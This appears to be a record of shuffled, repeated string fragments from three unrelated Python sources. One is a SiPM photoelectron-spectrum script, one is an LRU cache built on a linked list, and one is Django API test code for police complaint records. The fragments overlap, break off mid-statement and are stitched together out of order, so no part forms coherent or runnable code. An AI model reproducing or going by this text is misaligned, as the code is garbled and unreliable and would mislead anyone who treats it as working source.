papk = np.power(1 - pap, N[:, 0]) p0ap", "as an input to sim_telarray after ' 'normalisation with Konrads script') parser =", "dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the", "args.spe_sigma opct = args.opct pap = args.pap dap = args.dap print( \"\"\" SPE", "plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__ == '__main__': main()", "main(): description = ('Obtain the single photoelectron response for an SiPM. ' 'Can", "pap, N[:, 0]) p0ap = pct * papk pap1 = pct * (1-papk)", "' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical", "((1 - opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:,", "default=0, type=float, help='Value for the distance of the afterpulse peak ' 'from main", "import ArgumentDefaultsHelpFormatter as Formatter import numpy as np from scipy.special import binom from", "n_peaks)[:, None] # Probability of n fired microcells due to optical crosstalk pct", "argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma',", "sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir) output_path", "= os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path =", "dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store',", "default=0.1, type=float, help='Value for the standard deviation of the single ' 'photoelectron peak')", "SiPM. ' 'Can be used as an input to sim_telarray after ' 'normalisation", "response for an SiPM. Can be used as an input to sim_telarray after", "This implementation only considers the case for a 100% probability of a single", "** 2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] *", "action='store', default=0.1, type=float, help='Value for the standard deviation of the single ' 'photoelectron", "n fired microcells due to optical crosstalk pct = ((1 - opct) *", "pct = ((1 - opct) * np.power(opct, N - 1) * binom(N -", "SPE Parameters: spe_sigma = {} opct = {} pap = {} dap =", "papk = np.power(1 - pap, N[:, 0]) p0ap = pct * papk pap1", "fired microcells due to optical crosstalk pct = ((1 - opct) * np.power(opct,", "= argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store', required=True, help='Output directory for the files')", "return signal.sum(0) def main(): description = ('Obtain the single photoelectron response for an", "an SiPM. ' 'Can be used as an input to sim_telarray after '", "numpy as np from scipy.special import binom from scipy.stats import norm from IPython", "afterpulse peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None]", "N = np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n", "for an SiPM. ' 'Can be used as an input to sim_telarray after", "implementation only considers the case for a 100% probability of a single inital", "= os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if __name__", "of the single photoelectron peak opct : float Probability of optical crosstalk pap", "afterpulse dap : float Distance of afterpulse peak from main peak \"\"\" n_peaks", "normalisation with Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter", "100% probability of a single inital fired microcell Parameters ---------- x : ndarray", "to sim_telarray after ' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o',", "{}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path))", "def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G", "microcell Parameters ---------- x : ndarray X points to evaluate at spe_sigma :", "for an SiPM. Can be used as an input to sim_telarray after normalisation", "pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {}", "= np.arange(n_peaks)[:, None] K = np.arange(1, n_peaks)[:, None] # Probability of n fired", "binom from scipy.stats import norm from IPython import embed from matplotlib import pyplot", "a 100% probability of a single inital fired microcell Parameters ---------- x :", "= sipm_enf(x, spe_sigma, opct, pap, dap) gt = y > 1E-15 x =", "np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x,", "plt import os def sipm_enf(x, spe_sigma, opct, pap, dap): \"\"\" SiPM formula from", "action='store', required=True, help='Output directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value", "optical crosstalk pct = ((1 - opct) * np.power(opct, N - 1) *", "'Can be used as an input to sim_telarray after ' 'normalisation with Konrads", "K * (1.0-dap), ap_sigma) return signal.sum(0) def main(): description = ('Obtain the single", "norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return", "dap) gt = y > 1E-15 x = x[gt] y = y[gt] #", "np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) gt = y", "\"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\")", "- opct) * np.power(opct, N - 1) * binom(N - 1, 0))[:, 0]", "to evaluate at spe_sigma : float Width of the single photoelectron peak opct", "Konrads script \"\"\" import argparse from argparse import ArgumentDefaultsHelpFormatter as Formatter import numpy", "float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the", "output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure : {}\".format(output_path)) if", "---------- x : ndarray X points to evaluate at spe_sigma : float Width", "from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K =", ") x = np.linspace(0, 100, 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap)", "probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for the distance of", "y = y[gt] # Resample x = np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x,", "'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk')", "= sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir): print(\"Creating directory: {}\".format(output_dir)) os.makedirs(output_dir)", "\"\"\" SiPM formula from Gentile 2010 http://adsabs.harvard.edu/abs/2010arXiv1006.3263G This implementation only considers the case", "used as an input to sim_telarray after normalisation with Konrads script \"\"\" import", "a single inital fired microcell Parameters ---------- x : ndarray X points to", "the distance of the afterpulse peak ' 'from main peak') args = parser.parse_args()", "signal += pap1[K] * norm.pdf(x, K * (1.0-dap), ap_sigma) return signal.sum(0) def main():", "np.linspace(x.min(), x.max(), 1000) y = sipm_enf(x, spe_sigma, opct, pap, dap) if not os.path.exists(output_dir):", "config : {}\".format(output_path)) output_path = os.path.join(output_dir, \"checs_spe_spectrum.pdf\") plt.semilogy(x, y) plt.savefig(output_path, bbox_inches='tight') print(\"Created figure", "directory for the files') parser.add_argument('--spe_sigma', dest='spe_sigma', action='store', default=0.1, type=float, help='Value for the standard", "default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float,", "2) ap_sigma = np.sqrt(K * sap ** 2) signal = p0ap[K] * norm.pdf(x,", "help='Value for the probability of afterpulses') parser.add_argument('--dap', dest='dap', action='store', default=0, type=float, help='Value for", "os.path.join(output_dir, \"checs_spe_spectrum.txt\") np.savetxt(output_path, np.column_stack((x, y, y))) print(\"Created config : {}\".format(output_path)) output_path = os.path.join(output_dir,", "args.opct pap = args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma =", "= {} pap = {} dap = {} \"\"\".format(spe_sigma, opct, pap, dap) )", "2) signal = p0ap[K] * norm.pdf(x, K, pe_sigma) signal += pap1[K] * norm.pdf(x,", "main peak') args = parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct =", "single ' 'photoelectron peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for", "parser.parse_args() output_dir = args.output_dir spe_sigma = args.spe_sigma opct = args.opct pap = args.pap", "peak') parser.add_argument('--opct', dest='opct', action='store', default=0.1, type = float, help='Value for optical crosstalk') parser.add_argument('--pap',", "help='Value for the distance of the afterpulse peak ' 'from main peak') args", "optical crosstalk') parser.add_argument('--pap', dest='pap', action='store', default=0, type=float, help='Value for the probability of afterpulses')", "peak from main peak \"\"\" n_peaks = 100 N = np.arange(n_peaks)[:, None] K", "* (1-papk) * papk pe_sigma = np.sqrt(K * spe_sigma ** 2) ap_sigma =", "case for a 100% probability of a single inital fired microcell Parameters ----------", "= args.pap dap = args.dap print( \"\"\" SPE Parameters: spe_sigma = {} opct", "' 'normalisation with Konrads script') parser = argparse.ArgumentParser(description=description, formatter_class=Formatter) parser.add_argument('-o', '--output', dest='output_dir', action='store'," ]
[ "return None def put(self, key: str, value: str) -> None: # eviction if", "used\" cache, which evicts the least recently used item. The cache should map", "__init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be a positive", "Get key from linked list node and remove key from hash table. \"\"\"", "list. Insert key -> node mapping into hash table. Retrieving Value by Key:", "def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be a", "point into the nodes of a linked list, which represents last-use ordering. Do", "average case O(1) time: Inserting Key, Value Pair: Create a linked list node", "\"least recently used\" cache, which evicts the least recently used item. The cache", "insert and retrieve a value associated with a particular key) and be initialized", "least recently used item. The cache should map from keys to values (allowing", "value associated with a particular key) and be initialized with a max size.", "represents last-use ordering. Do the following in average case O(1) time: Inserting Key,", "key -> node mapping into hash table. Retrieving Value by Key: Look up", "front of linked list. Hash table does not need to be updated. Eviction:", "and key not in self.map: node = self.use_ordering.pop() if node is not None:", "from keys to values (allowing you to insert and retrieve a value associated", "LRU Cache: Design and build a \"least recently used\" cache, which evicts the", "Insert key -> node mapping into hash table. Retrieving Value by Key: Look", "a value associated with a particular key) and be initialized with a max", "of linked list. Hash table does not need to be updated. Eviction: Remove", "mapping into hash table. Retrieving Value by Key: Look up node in hash", "value. Update most recently used item Finding Least Recently Used: Least recently used", "Finding Least Recently Used: Least recently used item will be found at the", "tail of linked list. Get key from linked list node and remove key", "key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data", "put(self, key: str, value: str) -> None: # eviction if cache is full", "eviction if cache is full if len(self.map) == self.capacity and key not in", "positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList", "DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None", "table. Retrieving Value by Key: Look up node in hash table and return", "full if len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop()", "with key, value. Insert into head of linked list. Insert key -> node", "Eviction: Remove tail of linked list. Get key from linked list node and", "Remove tail of linked list. Get key from linked list node and remove", "Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) ->", "data.value return None def put(self, key: str, value: str) -> None: # eviction", "from linked list node and remove key from hash table. \"\"\" from typing", "a particular key) and be initialized with a max size. When it is", "used item Finding Least Recently Used: Least recently used item will be found", "ordering. Do the following in average case O(1) time: Inserting Key, Value Pair:", "by Key: Look up node in hash table and return value. Update most", "and the values are strings. (16.25, p533) Solution: Use hash table to point", "LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must be", "last-use ordering. Do the following in average case O(1) time: Inserting Key, Value", "is full if len(self.map) == self.capacity and key not in self.map: node =", "which evicts the least recently used item. The cache should map from keys", "Recently Used: Move node to front of linked list. Hash table does not", "if len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop() if", "self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList()", "str value: str class LruCache: def __init__(self, capacity: int): if capacity < 1:", "import * class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity:", "item Finding Least Recently Used: Least recently used item will be found at", "import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str", "datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache: def __init__(self,", "least recently used item. You can assume the keys are integers and the", "class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int): if", "class LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity must", "node and remove key from hash table. \"\"\" from typing import NamedTuple, Dict", "When it is full, it should evict the least recently used item. You", "particular key) and be initialized with a max size. When it is full,", "item. You can assume the keys are integers and the values are strings.", "linked list. Hash table does not need to be updated. Eviction: Remove tail", "ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node]", "hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class", "= capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self,", "raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map: Dict[str,", "key) and be initialized with a max size. When it is full, it", "recently used item will be found at the end of the linked list.", "self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self, key: str,", "strings. (16.25, p533) Solution: Use hash table to point into the nodes of", "should evict the least recently used item. You can assume the keys are", "of linked list. Insert key -> node mapping into hash table. Retrieving Value", "need to be updated. Eviction: Remove tail of linked list. Get key from", "and build a \"least recently used\" cache, which evicts the least recently used", "following in average case O(1) time: Inserting Key, Value Pair: Create a linked", "The cache should map from keys to values (allowing you to insert and", "will be found at the end of the linked list. Updating Most Recently", "map from keys to values (allowing you to insert and retrieve a value", "(allowing you to insert and retrieve a value associated with a particular key)", "the least recently used item. The cache should map from keys to values", "NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class", "Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache:", "= DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map: node:", "hash table and return value. Update most recently used item Finding Least Recently", "self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value", "-> None: # eviction if cache is full if len(self.map) == self.capacity and", "into the nodes of a linked list, which represents last-use ordering. Do the", "and return value. Update most recently used item Finding Least Recently Used: Least", "table and return value. Update most recently used item Finding Least Recently Used:", "integers and the values are strings. (16.25, p533) Solution: Use hash table to", "value: str) -> None: # eviction if cache is full if len(self.map) ==", "Retrieving Value by Key: Look up node in hash table and return value.", "* class Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int):", "list. Hash table does not need to be updated. Eviction: Remove tail of", "key from linked list node and remove key from hash table. \"\"\" from", "be initialized with a max size. When it is full, it should evict", "nodes of a linked list, which represents last-use ordering. Do the following in", "key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node)", "str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node)", "head of linked list. Insert key -> node mapping into hash table. Retrieving", "initialized with a max size. When it is full, it should evict the", "Create a linked list node with key, value. Insert into head of linked", "if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] =", "evict the least recently used item. You can assume the keys are integers", "from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str", "keys are integers and the values are strings. (16.25, p533) Solution: Use hash", "len(self.map) == self.capacity and key not in self.map: node = self.use_ordering.pop() if node", "Key, Value Pair: Create a linked list node with key, value. Insert into", "node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return", "node with key, value. Insert into head of linked list. Insert key ->", "of the linked list. Updating Most Recently Used: Move node to front of", "from hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import *", "< 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity", "DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node", "1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int = capacity self.map:", "linked list. Insert key -> node mapping into hash table. Retrieving Value by", "table does not need to be updated. Eviction: Remove tail of linked list.", "-> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data:", "at the end of the linked list. Updating Most Recently Used: Move node", "values (allowing you to insert and retrieve a value associated with a particular", "node to front of linked list. Hash table does not need to be", "size. When it is full, it should evict the least recently used item.", "str class LruCache: def __init__(self, capacity: int): if capacity < 1: raise ValueError(\"capacity", "a \"least recently used\" cache, which evicts the least recently used item. The", "hash table. Retrieving Value by Key: Look up node in hash table and", "to front of linked list. Hash table does not need to be updated.", "Use hash table to point into the nodes of a linked list, which", "build a \"least recently used\" cache, which evicts the least recently used item.", "self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key]", "must be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] =", "capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key:", "capacity: int): if capacity < 1: raise ValueError(\"capacity must be a positive integer\")", "which represents last-use ordering. Do the following in average case O(1) time: Inserting", "int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def", "cache, which evicts the least recently used item. The cache should map from", "if capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int", "and be initialized with a max size. When it is full, it should", "in self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node", "list. Get key from linked list node and remove key from hash table.", "a linked list node with key, value. Insert into head of linked list.", "Used: Move node to front of linked list. Hash table does not need", "DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key in self.map:", "Value by Key: Look up node in hash table and return value. Update", "it is full, it should evict the least recently used item. You can", "data: Item = node.data return data.value return None def put(self, key: str, value:", "if cache is full if len(self.map) == self.capacity and key not in self.map:", "to be updated. Eviction: Remove tail of linked list. Get key from linked", "it should evict the least recently used item. You can assume the keys", "Move node to front of linked list. Hash table does not need to", "key: str value: str class LruCache: def __init__(self, capacity: int): if capacity <", "recently used\" cache, which evicts the least recently used item. The cache should", "and remove key from hash table. \"\"\" from typing import NamedTuple, Dict from", "Design and build a \"least recently used\" cache, which evicts the least recently", "can assume the keys are integers and the values are strings. (16.25, p533)", "are integers and the values are strings. (16.25, p533) Solution: Use hash table", "in hash table and return value. Update most recently used item Finding Least", "not in self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key]", "capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int =", "should map from keys to values (allowing you to insert and retrieve a", "retrieve a value associated with a particular key) and be initialized with a", "assume the keys are integers and the values are strings. (16.25, p533) Solution:", "node.data return data.value return None def put(self, key: str, value: str) -> None:", "does not need to be updated. Eviction: Remove tail of linked list. Get", "updated. Eviction: Remove tail of linked list. Get key from linked list node", "if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item =", "of linked list. Get key from linked list node and remove key from", "table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple):", "full, it should evict the least recently used item. You can assume the", "into head of linked list. Insert key -> node mapping into hash table.", "most recently used item Finding Least Recently Used: Least recently used item will", "Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item", "linked list node with key, value. Insert into head of linked list. Insert", "Look up node in hash table and return value. Update most recently used", "Least recently used item will be found at the end of the linked", "list. Updating Most Recently Used: Move node to front of linked list. Hash", "item. The cache should map from keys to values (allowing you to insert", "recently used item. You can assume the keys are integers and the values", "int): if capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity:", "Used: Least recently used item will be found at the end of the", "self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self,", "self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key in", "key, value. Insert into head of linked list. Insert key -> node mapping", "None def put(self, key: str, value: str) -> None: # eviction if cache", "be found at the end of the linked list. Updating Most Recently Used:", "hash table to point into the nodes of a linked list, which represents", "used item. You can assume the keys are integers and the values are", "you to insert and retrieve a value associated with a particular key) and", "list node with key, value. Insert into head of linked list. Insert key", "table to point into the nodes of a linked list, which represents last-use", "be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {}", "in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return", "self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node =", "linked list. Get key from linked list node and remove key from hash", "a max size. When it is full, it should evict the least recently", "remove key from hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list", "a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering:", "Update most recently used item Finding Least Recently Used: Least recently used item", "None: # eviction if cache is full if len(self.map) == self.capacity and key", "key from hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import", "case O(1) time: Inserting Key, Value Pair: Create a linked list node with", "linked list node and remove key from hash table. \"\"\" from typing import", "typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value:", "def get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node =", "Least Recently Used: Least recently used item will be found at the end", "\"\"\" LRU Cache: Design and build a \"least recently used\" cache, which evicts", "list node and remove key from hash table. \"\"\" from typing import NamedTuple,", "Solution: Use hash table to point into the nodes of a linked list,", "the least recently used item. You can assume the keys are integers and", "Hash table does not need to be updated. Eviction: Remove tail of linked", "associated with a particular key) and be initialized with a max size. When", "used item. The cache should map from keys to values (allowing you to", "with a max size. When it is full, it should evict the least", "recently used item Finding Least Recently Used: Least recently used item will be", "list, which represents last-use ordering. Do the following in average case O(1) time:", "the end of the linked list. Updating Most Recently Used: Move node to", "keys to values (allowing you to insert and retrieve a value associated with", "from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache: def", "self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self, key:", "into hash table. Retrieving Value by Key: Look up node in hash table", "max size. When it is full, it should evict the least recently used", "is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] = node self.use_ordering.append_left(node)", "the values are strings. (16.25, p533) Solution: Use hash table to point into", "DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]:", "with a particular key) and be initialized with a max size. When it", "integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList =", "Insert into head of linked list. Insert key -> node mapping into hash", "return data.value return None def put(self, key: str, value: str) -> None: #", "Updating Most Recently Used: Move node to front of linked list. Hash table", "to insert and retrieve a value associated with a particular key) and be", "to values (allowing you to insert and retrieve a value associated with a", "end of the linked list. Updating Most Recently Used: Move node to front", "value: str class LruCache: def __init__(self, capacity: int): if capacity < 1: raise", "a linked list, which represents last-use ordering. Do the following in average case", "str, value: str) -> None: # eviction if cache is full if len(self.map)", "Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int): if capacity", "node mapping into hash table. Retrieving Value by Key: Look up node in", "node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] = node", "node in hash table and return value. Update most recently used item Finding", "not need to be updated. Eviction: Remove tail of linked list. Get key", "node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key,", "def put(self, key: str, value: str) -> None: # eviction if cache is", "cache is full if len(self.map) == self.capacity and key not in self.map: node", "get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key]", "recently used item. The cache should map from keys to values (allowing you", "You can assume the keys are integers and the values are strings. (16.25,", "key not in self.map: node = self.use_ordering.pop() if node is not None: del", "(16.25, p533) Solution: Use hash table to point into the nodes of a", "str) -> None: # eviction if cache is full if len(self.map) == self.capacity", "the keys are integers and the values are strings. (16.25, p533) Solution: Use", "linked list. Updating Most Recently Used: Move node to front of linked list.", "of a linked list, which represents last-use ordering. Do the following in average", "and retrieve a value associated with a particular key) and be initialized with", "Value Pair: Create a linked list node with key, value. Insert into head", "Inserting Key, Value Pair: Create a linked list node with key, value. Insert", "the nodes of a linked list, which represents last-use ordering. Do the following", "the following in average case O(1) time: Inserting Key, Value Pair: Create a", "self.capacity and key not in self.map: node = self.use_ordering.pop() if node is not", "# eviction if cache is full if len(self.map) == self.capacity and key not", "O(1) time: Inserting Key, Value Pair: Create a linked list node with key,", "is full, it should evict the least recently used item. You can assume", "Pair: Create a linked list node with key, value. Insert into head of", "= {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if", "Do the following in average case O(1) time: Inserting Key, Value Pair: Create", "Item = node.data return data.value return None def put(self, key: str, value: str)", "used item will be found at the end of the linked list. Updating", "= self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def", "values are strings. (16.25, p533) Solution: Use hash table to point into the", "time: Inserting Key, Value Pair: Create a linked list node with key, value.", "Most Recently Used: Move node to front of linked list. Hash table does", "p533) Solution: Use hash table to point into the nodes of a linked", "to point into the nodes of a linked list, which represents last-use ordering.", "{} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key", "self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str)", "= self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value))", "be updated. Eviction: Remove tail of linked list. Get key from linked list", "cache should map from keys to values (allowing you to insert and retrieve", "== self.capacity and key not in self.map: node = self.use_ordering.pop() if node is", "found at the end of the linked list. Updating Most Recently Used: Move", "Cache: Design and build a \"least recently used\" cache, which evicts the least", "linked list, which represents last-use ordering. Do the following in average case O(1)", "item will be found at the end of the linked list. Updating Most", "the linked list. Updating Most Recently Used: Move node to front of linked", "\"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key:", "key: str, value: str) -> None: # eviction if cache is full if", "return value. Update most recently used item Finding Least Recently Used: Least recently", "= node.data return data.value return None def put(self, key: str, value: str) ->", "Key: Look up node in hash table and return value. Update most recently", "in average case O(1) time: Inserting Key, Value Pair: Create a linked list", "up node in hash table and return value. Update most recently used item", "Recently Used: Least recently used item will be found at the end of", "-> node mapping into hash table. Retrieving Value by Key: Look up node", "evicts the least recently used item. The cache should map from keys to", "are strings. (16.25, p533) Solution: Use hash table to point into the nodes", "value. Insert into head of linked list. Insert key -> node mapping into" ]
[ "1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True)", "{ 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date':", "'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age':", "import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 =", "race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3,", "Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge':", "MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import", "'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago',", "allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' })", "20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer =", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7,", "'<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator',", "= OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, 